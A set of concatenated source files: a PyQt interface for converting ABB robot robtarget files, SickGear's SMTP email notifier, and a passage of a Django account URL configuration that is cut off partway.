palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 172))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 196))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 172))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 138))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame.setPalette(palette)
self.frame.setStyleSheet("background-color: rgb(255, 182, 65);")
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.pbRobt2Ast = QtWidgets.QPushButton(self.frame)
# !!
self.pbRobt2Ast.clicked.connect(self.runConvertRobt2Ast)
# !!
self.pbRobt2Ast.setGeometry(QtCore.QRect(10, 360, 211, 24))
self.pbRobt2Ast.setStyleSheet("color: rgb(170, 0, 0);\n"
"font: 75 10pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(193, 193, 193);")
self.pbRobt2Ast.setObjectName("pbRobt2Ast")
self.pbAst2Robt = QtWidgets.QPushButton(self.frame)
# !!
self.pbAst2Robt.clicked.connect(self.runConvertAst2Robt)
# !!
self.pbAst2Robt.setGeometry(QtCore.QRect(10, 320, 211, 26))
self.pbAst2Robt.setStyleSheet("color: rgb(0, 85, 255);\n"
"font: 75 10pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(193, 193, 193);")
self.pbAst2Robt.setObjectName("pbAst2Robt")
self.verticalLayoutWidget = QtWidgets.QWidget(self.frame)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 120, 201, 118))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label.setMinimumSize(QtCore.QSize(199, 32))
self.label.setMaximumSize(QtCore.QSize(16777215, 32))
self.label.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 75 10pt \"MS Shell Dlg 2\";")
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.textPrefix = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.textPrefix.setStyleSheet("border-color: rgb(170, 0, 0);\n"
"font: 12pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(255, 255, 255);\n"
"")
self.textPrefix.setObjectName("textPrefix")
self.verticalLayout.addWidget(self.textPrefix)
self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_2.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 75 10pt \"MS Shell Dlg 2\";")
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.textSuffix = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.textSuffix.setStyleSheet("border-color: rgb(170, 0, 0);\n"
"font: 12pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(255, 255, 255);")
self.textSuffix.setObjectName("textSuffix")
self.verticalLayout.addWidget(self.textSuffix)
self.formLayoutWidget = QtWidgets.QWidget(self.frame)
self.formLayoutWidget.setGeometry(QtCore.QRect(10, 20, 361, 66))
self.formLayoutWidget.setObjectName("formLayoutWidget")
self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)
self.formLayout.setContentsMargins(0, 0, 0, 0)
self.formLayout.setObjectName("formLayout")
self.pbTarget = QtWidgets.QPushButton(self.formLayoutWidget)
# !!
self.pbTarget.clicked.connect(self.handlePbTarget)
# !!
self.pbTarget.setStyleSheet("font: 75 11pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(193, 193, 193);")
self.pbTarget.setObjectName("pbTarget")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.pbTarget)
self.pbMod = QtWidgets.QPushButton(self.formLayoutWidget)
# !!
self.pbMod.clicked.connect(self.handlePbMod)
# !!
self.pbMod.setStyleSheet("font: 75 11pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(193, 193, 193);")
self.pbMod.setObjectName("pbMod")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.pbMod)
self.lineMod = QtWidgets.QLineEdit(self.formLayoutWidget)
self.lineMod.setStyleSheet("border-color: rgb(170, 0, 0);\n"
"font: 10pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(255, 255, 255);\n"
"")
self.lineMod.setReadOnly(True)
self.lineMod.setObjectName("lineMod")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.lineMod)
self.lineTarget = QtWidgets.QLineEdit(self.formLayoutWidget)
self.lineTarget.setStyleSheet("border-color: rgb(170, 0, 0);\n"
"font: 10pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(255, 255, 255);\n"
"")
self.lineTarget.setReadOnly(True)
self.lineTarget.setObjectName("lineTarget")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.lineTarget)
self.pbRobt2Ast.raise_()
self.pbAst2Robt.raise_()
self.verticalLayoutWidget.raise_()
self.formLayoutWidget.raise_()
self.frame_2 = QtWidgets.QFrame(self.centralwidget)
self.frame_2.setGeometry(QtCore.QRect(430, 20, 281, 421))
self.frame_2.setStyleSheet("background-color: rgb(205, 52, 255);")
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.frame_2)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(10, 20, 258, 231))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
# ===============================================
self.label_3 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_3.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 75 11pt \"MS Shell Dlg 2\";\n"
"text-decoration: underline;")
self.label_3.setObjectName("label_3")
self.verticalLayout_2.addWidget(self.label_3)
# ===============================================
self.label_5 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_5.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 75 8pt \"MS Shell Dlg 2\";\n")
self.label_5.setObjectName("label_5")
self.verticalLayout_2.addWidget(self.label_5)
#===============================================
self.label_6 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_6.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 75 8pt \"MS Shell Dlg 2\";")
self.label_6.setObjectName("label_6")
self.verticalLayout_2.addWidget(self.label_6)
# ===============================================
self.listUserMove = QtWidgets.QListWidget(self.verticalLayoutWidget_2)
# !!
self.filledListUserMove()
# !!
self.listUserMove.setMouseTracking(False)
self.listUserMove.setStyleSheet("background-color: rgb(205, 52, 255);")
self.listUserMove.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
self.listUserMove.setViewMode(QtWidgets.QListView.ListMode)
self.listUserMove.setObjectName("listUserMove")
self.verticalLayout_2.addWidget(self.listUserMove)
self.verticalLayoutWidget_3 = QtWidgets.QWidget(self.frame_2)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(10, 260, 169, 136))
self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_3)
self.label_4.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 75 10pt \"MS Shell Dlg 2\";")
self.label_4.setObjectName("label_4")
self.verticalLayout_3.addWidget(self.label_4)
self.lineNewInst = QtWidgets.QLineEdit(self.verticalLayoutWidget_3)
self.lineNewInst.setStyleSheet("border-color: rgb(170, 0, 0);\n"
"font: 10pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(255, 255, 255);")
self.lineNewInst.setObjectName("lineNewInst")
self.verticalLayout_3.addWidget(self.lineNewInst)
self.radioButton_1 = QtWidgets.QRadioButton(self.verticalLayoutWidget_3)
self.radioButton_1.setChecked(True)
self.radioButton_1.setObjectName("radioButton_1")
self.verticalLayout_3.addWidget(self.radioButton_1)
self.radioButton_2 = QtWidgets.QRadioButton(self.verticalLayoutWidget_3)
self.radioButton_2.setObjectName("radioButton_2")
self.verticalLayout_3.addWidget(self.radioButton_2)
self.radioButton_3 = QtWidgets.QRadioButton(self.verticalLayoutWidget_3)
self.radioButton_3.setObjectName("radioButton_3")
self.verticalLayout_3.addWidget(self.radioButton_3)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.pbAddMove = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
# !!
self.pbAddMove.clicked.connect(self.handlePbAddMove)
# !!
self.pbAddMove.setStyleSheet("color: rgb(0, 85, 255);\n"
"font: 75 11pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(193, 193, 193);")
self.pbAddMove.setObjectName("pbAddMove")
self.horizontalLayout_2.addWidget(self.pbAddMove)
self.pbDelMove = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
# !!
self.pbDelMove.clicked.connect(self.handlePbDelMove)
# !!
self.pbDelMove.setStyleSheet("color: rgb(170, 0, 0);\n"
"font: 75 11pt \"MS Shell Dlg 2\";\n"
"background-color: rgb(193, 193, 193);")
self.pbDelMove.setObjectName("pbDelMove")
self.horizontalLayout_2.addWidget(self.pbDelMove)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.verticalLayoutWidget_2.raise_()
self.verticalLayoutWidget_3.raise_()
self.label_4.raise_()
self.frame.raise_()
self.frame_2.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 730, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionUser_motion_instructions = QtWidgets.QAction(MainWindow)
self.actionUser_motion_instructions.setObjectName("actionUser_motion_instructions")
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi (self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "ABB RapidTools_v2017.01 [by X.Fernandez]"))
self.pbRobt2Ast.setText(_translate("MainWindow", "Convert from Robtarget to *"))
self.pbAst2Robt.setText(_translate("MainWindow", "Convert from * to Robtarget"))
self.label.setText(_translate("MainWindow", "Prefix"))
self.label_2.setText(_translate("MainWindow", "Suffix"))
self.pbTarget.setText(_translate("MainWindow", "Select target file"))
self.pbMod.setText(_translate("MainWindow", "Save modified file to:"))
self.label_3.setText(_translate("MainWindow", "User Motion Instructions"))
self.label_5.setText(_translate("MainWindow", "* tick the box of the instruction you \nwould like to exclude from the conversion"))
self.label_6.setText(_translate("MainWindow", "** tick the box of the instruction you \nwould like to delete and click 'Delete' button"))
self.label_4.setText(_translate("MainWindow", "New motion instruction"))
self.radioButton_1.setText(_translate("MainWindow", "Lineal"))
self.radioButton_2.setText(_translate("MainWindow", "Joint"))
self.radioButton_3.setText(_translate("MainWindow", "Circular"))
self.pbAddMove.setText(_translate("MainWindow", "Add"))
self.pbDelMove.setText(_translate("MainWindow", "Delete"))
self.actionUser_motion_instructions.setText(_translate("MainWindow", "User motion instructions"))
def handlePbTarget (self):
"""
Method that handles the click action of the 'Select target file' button.
Opens a dialog in order to select the target file.
"""
filename = QtWidgets.QFileDialog.getOpenFileName(MainWindow, "Open file", "C://",
"ABB Files (*.mod)")
if filename:
self.lineTarget.setText(filename[0])
def handlePbMod (self):
"""
Method that handles the click action of the 'Save Modified file to' button.
Opens a dialog in order to select the dir where the modified file will be store.
"""
directory = QtWidgets.QFileDialog.getExistingDirectory(MainWindow, "Open a folder", "C:/",
QtWidgets.QFileDialog.ShowDirsOnly)
if directory:
self.lineMod.setText(directory)
def handlePbAddMove (self):
"""
Method that handles the click action of the 'Add' button.
Add instruction given in textfield of the user interface.
"""
msgBox =MyMessages.MyMsg()
strInst = self.lineNewInst.text()
strType = ''
if self.radioButton_1.isChecked():
strType = 'Lineal'
if self.radioButton_2.isChecked():
strType = 'Joint'
if self.radioButton_3.isChecked():
strType = 'Circular'
if strType and strInst and not xml_file.findDuplicates(strInst):
xml_file.appendMovement(strInst, strType)
item = QtWidgets.QListWidgetItem(self.listUserMove)
ch = QtWidgets.QCheckBox()
ch.setText(strInst)
self.listUserMove.setItemWidget(item, ch)
self.lineNewInst.setText('')
self.listUserMove.repaint()
elif xml_file.findDuplicates(strInst):
msgBox.msgBoxInfo("Instruction already exist", None, "Adding instruction")
else:
msgBox.msgBoxInfo("Instruction empty", None, "Adding instruction")
def handlePbDelMove (self):
"""
Method that handles the click action of the 'Delete' button.
Deletes instruction checked in the user interface list.
"""
removeList = list()
for index in range(self.listUserMove.count()):
check_box = self.listUserMove.itemWidget(self.listUserMove.item(index))
state = check_box.checkState()
if state == 2:
removeList.append(check_box.text())
for strRemove in removeList:
xml_file.removeMovement(strRemove)
self.listUserMove.clear()
self.filledListUserMove()
self.listUserMove.repaint()
def filledListUserMove (self):
"""
Method that fills the list of keyword or instruction
in the user interface.
"""
for aItem in xml_file.getMovements():
item = QtWidgets.QListWidgetItem(self.listUserMove)
ch = QtWidgets.QCheckBox()
ch.setText(aItem)
self.listUserMove.setItemWidget(item, ch)
def getCheckedItems (self):
"""
Method that returns a list of the keyword or instruction
checked in the user interface.
"""
chekedList = list()
for index in range(self.listUserMove.count()):
check_box = self.listUserMove.itemWidget(self.listUserMove.item(index))
state = check_box.checkState()
if state == 2:
chekedList.append(check_box.text())
return chekedList
def getKeywordList (self):
"""
Method that returns a list of the keyword or instruction
in the user interface.
"""
listItems = list()
for index in range(self.listUserMove.count()):
check_box = self.listUserMove.itemWidget(self.listUserMove.item(index))
listItems.append(check_box.text())
return listItems
def runConvertAst2Robt (self):
"""
Method that runs * to robtarget conversion.
Method call when pbAst2Robt button clicked
"""
msgBox = MyMessages.MyMsg()
try:
keywordList = self.getKeywordList()
excludedList = self.getCheckedItems()
strTarget = self.lineTarget.text()
strMod = self.lineMod.text()
strPrefix = self.textPrefix.text()
strSuffix = self.textSuffix.text()
# ===================================
if not strTarget:
raise MyMessages.MyError(1)
if not strMod:
raise MyMessages.MyError(2)
if not strPrefix:
raise MyMessages.MyError(3)
# ====================================================================================================
targetFileObject = TargetFile.TargetFile(strTarget, keywordList, excludedList, strPrefix, strSuffix)
targetFileObject.processAst2RobtTargetFile()
# ====================================================================================================
modFileObject = ModFile.ModFile(strMod, targetFileObject.getFileArray(),
targetFileObject.getSubFileArray(), strPrefix, strSuffix)
modFileObject.processAst2RobtModFile()
# ====================================================================================================
msgBox.msgBoxInfo("Asterisk to robtarget converted", "Process finish", "Convert asterisk2robtarget")
# ====================================================================================================
except FileNotFoundError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert asterisk2robtarget")
except PermissionError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert asterisk2robtarget")
except MyMessages.MyError as e:
exceptValue = e.value
if exceptValue == 1:
msgBox.msgBoxWarning("WARNING!, Setting the target-file path required. ",
"Error", "Convert asterisk2robtarget")
elif exceptValue == 2:
msgBox.msgBoxWarning("WARNING!, Setting the modified-file dir path required. ",
"Error", "Convert asterisk2robtarget")
elif exceptValue == 3:
msgBox.msgBoxWarning("WARNING!, Setting the prefix-field required. ",
"Error", "Convert asterisk2robtarget")
def runConvertRobt2Ast (self):
"""
Method that runs robtarget to * conversion.
Method call when pbRobt2Ast button clicked
"""
msgBox = MyMessages.MyMsg()
try:
keywordList = self.getKeywordList()
excludedList = self.getCheckedItems()
strTarget = self.lineTarget.text()
strMod = self.lineMod.text()
# ===================================
if not strTarget:
raise MyMessages.MyError(1)
if not strMod:
raise MyMessages.MyError(2)
# ====================================================================================================
targetFileObject = TargetFile.TargetFile(strTarget, keywordList, excludedList)
targetFileObject.processRobt2AstTargetFile()
# ====================================================================================================
modFileObject = ModFile.ModFile(strMod, targetFileObject.getFileArray(),
targetFileObject.getSubFileArray())
modFileObject.processRobt2AstModFile()
# ====================================================================================================
msgBox.msgBoxInfo("Robtarget to asterisk converted", "Process finish", "Convert robtarget2asterisk")
# ====================================================================================================
except FileNotFoundError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert robtarget2asterisk")
except PermissionError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert robtarget2asterisk")
except MyMessages.MyError as e:
exceptValue = e.value
if exceptValue == 1:
msgBox.msgBoxWarning("WARNING!, Setting the target-file path required. ",
"Error", "Convert robtarget2asterisk")
elif exceptValue == 2:
msgBox.msgBoxWarning("WARNING!, Setting the modified-file dir path required. ",
"Error", "Convert robtarget2asterisk")
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
XabierFernandez/Scripts-For-Robots
|
ABB/Robtargets_Converter/GUI/ABB_RapidTools.py
|
Python
|
gpl-3.0
| 32,147
|
# Authors:
# Derek Battams <derek@battams.ca>
# Pedro Jose Pereira Vieito (@pvieito) <pvieito@gmail.com>
#
# URL: https://github.com/sickgear/sickgear
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
import re
import sickbeard
import smtplib
from sickbeard import db
from sickbeard import logger
from sickbeard.common import notifyStrings, NOTIFY_SNATCH, NOTIFY_DOWNLOAD, NOTIFY_SUBTITLE_DOWNLOAD
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
class EmailNotifier:
def __init__(self):
self.last_err = None
def test_notify(self, host, port, smtp_from, use_tls, user, pwd, to):
msg = MIMEText('Success. This is a SickGear test message. Typically sent on, %s' %
notifyStrings[NOTIFY_DOWNLOAD])
msg['Subject'] = 'SickGear: Test message'
msg['From'] = smtp_from
msg['To'] = to
msg['Date'] = formatdate(localtime=True)
return self._sendmail(host, port, smtp_from, use_tls, user, pwd, [to], msg, True)
def _send_email(self, title, ep_name, lang='', extra='', force=False):
if not sickbeard.USE_EMAIL and not force:
return
show = ep_name.split(' - ')[0]
to = self._get_recipients(show)
if not any(to):
logger.log(u'No email recipients to notify, skipping', logger.WARNING)
return
logger.log(u'Email recipients to notify: %s' % to, logger.DEBUG)
try:
msg = MIMEMultipart('alternative')
msg.attach(MIMEText(
'<body style="font-family:Helvetica, Arial, sans-serif;">' +
'<h3>SickGear Notification - %s</h3>\n' % title +
'<p>Show: <b>' + show.encode('ascii', 'xmlcharrefreplace') +
'</b></p>\n<p>Episode: <b>' +
unicode(re.search('.+ - (.+?-.+) -.+', ep_name).group(1)).encode('ascii', 'xmlcharrefreplace') +
extra +
'</b></p>\n\n' +
'<footer style="margin-top:2.5em;padding:.7em 0;color:#777;border-top:#BBB solid 1px;">' +
'Powered by SickGear.</footer></body>',
'html'))
except:
try:
msg = MIMEText(ep_name)
except:
msg = MIMEText('Episode %s' % title)
msg['Subject'] = '%s%s: %s' % (lang, title, ep_name)
msg['From'] = sickbeard.EMAIL_FROM
msg['To'] = ','.join(to)
msg['Date'] = formatdate(localtime=True)
if self._sendmail(sickbeard.EMAIL_HOST, sickbeard.EMAIL_PORT, sickbeard.EMAIL_FROM, sickbeard.EMAIL_TLS,
sickbeard.EMAIL_USER, sickbeard.EMAIL_PASSWORD, to, msg):
logger.log(u'%s notification sent to [%s] for "%s"' % (title, to, ep_name), logger.DEBUG)
else:
logger.log(u'%s notification ERROR: %s' % (title, self.last_err), logger.ERROR)
def notify_snatch(self, ep_name, title=notifyStrings[NOTIFY_SNATCH]):
"""
Send a notification that an episode was snatched
:param ep_name: The name of the episode that was snatched
:param title: The title of the notification (optional)
"""
if sickbeard.EMAIL_NOTIFY_ONSNATCH:
title = sickbeard.EMAIL_OLD_SUBJECTS and 'Snatched' or title
self._send_email(title, ep_name)
def notify_download(self, ep_name, title=notifyStrings[NOTIFY_DOWNLOAD]):
"""
Send a notification that an episode was downloaded
:param ep_name: The name of the episode that was downloaded
:param title: The title of the notification (optional)
"""
if sickbeard.EMAIL_NOTIFY_ONDOWNLOAD:
title = sickbeard.EMAIL_OLD_SUBJECTS and 'Downloaded' or title
self._send_email(title, ep_name)
def notify_subtitle_download(self, ep_name, lang, title=notifyStrings[NOTIFY_SUBTITLE_DOWNLOAD]):
"""
Send a notification that a subtitle was downloaded
:param ep_name: The name of the episode that was downloaded
:param lang: Subtitle language
:param title: The title of the notification (optional)
"""
if sickbeard.EMAIL_NOTIFY_ONSUBTITLEDOWNLOAD:
title = sickbeard.EMAIL_OLD_SUBJECTS and 'Subtitle Downloaded' or title
self._send_email(title, ep_name, '%s ' % lang, '</b></p>\n<p>Language: <b>%s' % lang)
def notify_git_update(self, new_version='??'):
pass
@staticmethod
def _get_recipients(show_name=None):
email_list = []
# Grab the global recipients
if sickbeard.EMAIL_LIST:
for email_address in sickbeard.EMAIL_LIST.split(','):
if any(email_address.strip()):
email_list.append(email_address)
# Grab the recipients for the show
if None is not show_name:
my_db = db.DBConnection()
for result in my_db.select('SELECT notify_list FROM tv_shows WHERE show_name = ?', (show_name,)):
if result['notify_list']:
for email_address in result['notify_list'].split(','):
if any(email_address.strip()):
email_list.append(email_address)
return list(set(email_list))
def _sendmail(self, host, port, smtp_from, use_tls, user, pwd, to, msg, smtp_debug=False):
use_tls = 1 == sickbeard.helpers.tryInt(use_tls)
login = any(user) and any(pwd)
logger.log(u'Sendmail HOST: %s; PORT: %s; LOGIN: %s, TLS: %s, USER: %s, FROM: %s, TO: %s' % (
host, port, login, use_tls, user, smtp_from, to), logger.DEBUG)
try:
srv = smtplib.SMTP(host, int(port))
if smtp_debug:
srv.set_debuglevel(1)
if use_tls or login:
srv.ehlo()
logger.log(u'Sent initial EHLO command', logger.DEBUG)
if use_tls:
srv.starttls()
srv.ehlo()
logger.log(u'Sent STARTTLS and EHLO command', logger.DEBUG)
if login:
srv.login(user, pwd)
logger.log(u'Sent LOGIN command', logger.DEBUG)
srv.sendmail(smtp_from, to, msg.as_string())
srv.quit()
except Exception as e:
self.last_err = '%s' % e
return False
return True
notifier = EmailNotifier
|
jetskijoe/SickGear
|
sickbeard/notifiers/emailnotify.py
|
Python
|
gpl-3.0
| 7,110
|
from django.conf.urls.defaults import url, patterns
from django.contrib.aderit.access_account.views import (LoginView, LogoutView,
UpdateView,
ChangePasswordView,
ForgotPasswordView,
DetailView)
from account.models import Account
from account.utils import callback_on_login, callback_on_signup
from account.views import SignupView
urlpatterns = patterns('',
(r'^$', LoginView.as_view(redirect_to='/', allow_token=True,
template_name="account/account_form_as_ul.html")),
url(r'^login/((?P<token>.+)/)?$',
LoginView.as_view(allow_token=True,
after_login_callback=callback_on_login,
debug_dispatch_method=False,
template_name="account/account_form_as_ul.html",
delete_token_after_use=True),
name='login'),
url(r'^logout/$',
LogoutView.as_view(redirect_to='/', clean_response_cookies=True, debug_dispatch_method=False),
name='logout'),
url(r'^signup/$',
SignupView.as_view(model=Account, use_captcha=True,
additional_exclude_formfields=['token'],
require_formfields=['email'],
after_signup_callback=callback_on_signup,
debug_dispatch_method=True, debug_dispatch_method_full=False,
template_name="account/account_form_as_ul.html"),
name='signup'),
url(r'^password/change/((?P<slug>\d+)/)?$',
ChangePasswordView.as_view(model=Account, use_login_required_decorator=True,
template_name="account/account_form_as_ul.html",
change_done_template_name="account/pswchanged.html",
slug_field="id"),
name='chpsw'),
url(r'^password/forgot/((?P<token>.+)/)?$',
ForgotPasswordView.as_view(template_name="account/account_form_as_ul.html",
